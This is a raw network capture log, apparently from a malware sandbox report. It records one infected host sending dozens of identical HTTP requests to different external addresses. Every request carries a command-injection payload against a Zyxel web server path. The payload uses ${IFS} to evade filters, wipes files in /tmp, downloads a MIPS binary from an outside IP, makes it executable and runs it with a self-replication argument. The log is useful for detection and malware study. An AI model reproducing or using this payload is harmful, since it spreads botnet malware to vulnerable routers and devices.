                                      Jan 14, 2024 15:50:45.276757002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4033192.168.2.145497254.152.129.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.276819944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4034192.168.2.146034471.239.9.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.276882887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4035192.168.2.1434956177.253.175.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.276937008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4036192.168.2.145446494.152.187.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.276997089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4037192.168.2.1441000212.10.77.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.277054071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4038192.168.2.146096692.166.192.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.277117014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4039192.168.2.145135294.14.241.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.277178049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4040192.168.2.1444348202.93.98.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.277242899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4041192.168.2.1458348109.97.64.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.277291059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4042192.168.2.1453622200.123.19.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.277362108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4043192.168.2.1444758142.154.71.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.277420044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4044192.168.2.145224850.48.203.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.277446032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4045192.168.2.1454544128.94.9.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.277519941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4046192.168.2.145180845.135.169.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.277582884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4047192.168.2.144600825.237.41.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.277616978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4048192.168.2.143299660.108.34.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.277662039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4049192.168.2.144366054.18.20.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.277724981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4050192.168.2.1451376208.72.232.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.277755022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4051192.168.2.143740217.219.171.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.277806997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4052192.168.2.1449886113.234.228.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.277865887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4053192.168.2.1437216160.65.247.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.277928114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4054192.168.2.1456706172.157.252.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.277967930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4055192.168.2.143570050.38.236.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.278049946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4056192.168.2.145005012.195.74.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.278100967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4057192.168.2.1445584165.137.93.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.278171062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4058192.168.2.1447572189.240.85.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.278201103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4059192.168.2.145804435.96.227.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.278259993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4060192.168.2.145700480.76.153.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.278310061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4061192.168.2.1448148195.205.164.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.278362036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4062192.168.2.1439722146.170.52.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.278431892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4063192.168.2.143534620.1.253.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.278467894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4064192.168.2.1456476121.50.113.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.278498888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4065192.168.2.1442946109.38.181.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.278534889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4066192.168.2.1457576150.177.67.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.278614998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4067192.168.2.144790442.92.128.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.278656960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4068192.168.2.144983438.199.10.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.278707027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4069192.168.2.144949252.126.35.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.278783083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4070192.168.2.1434782145.8.160.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.278810978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4071192.168.2.1459284124.2.222.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.278882027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4072192.168.2.1437424110.255.210.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.278939962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4073192.168.2.145459831.102.155.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.278970003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4074192.168.2.1455452165.124.3.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.279047012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4075192.168.2.1436670139.77.236.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.279092073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4076192.168.2.144776490.207.44.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.279136896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4077192.168.2.1441786157.78.205.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.279196024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4078192.168.2.1434274141.44.21.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.279326916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4079192.168.2.145328059.147.34.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.279362917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4080192.168.2.144650847.32.249.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.279397011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4081192.168.2.1447708196.215.178.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.279459953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4082192.168.2.14447605.131.52.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.279510975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4083192.168.2.145672882.105.4.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.279547930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4084192.168.2.1460500152.230.39.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.279616117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4085192.168.2.1436626145.39.46.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.279664993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4086192.168.2.145182871.126.77.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.279719114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4087192.168.2.1444514168.10.216.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.279781103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4088192.168.2.145797483.113.49.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.279814959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4089192.168.2.1453352196.147.81.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.279876947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4090192.168.2.144780620.215.45.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.279901981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4091192.168.2.1441714113.93.114.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.279988050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4092192.168.2.1447202164.19.178.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.280014038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4093192.168.2.1450964112.225.52.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.280091047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4094192.168.2.1448888111.6.63.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.280128002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4095192.168.2.1452274116.65.15.166443
                                      TimestampBytes transferredDirectionData
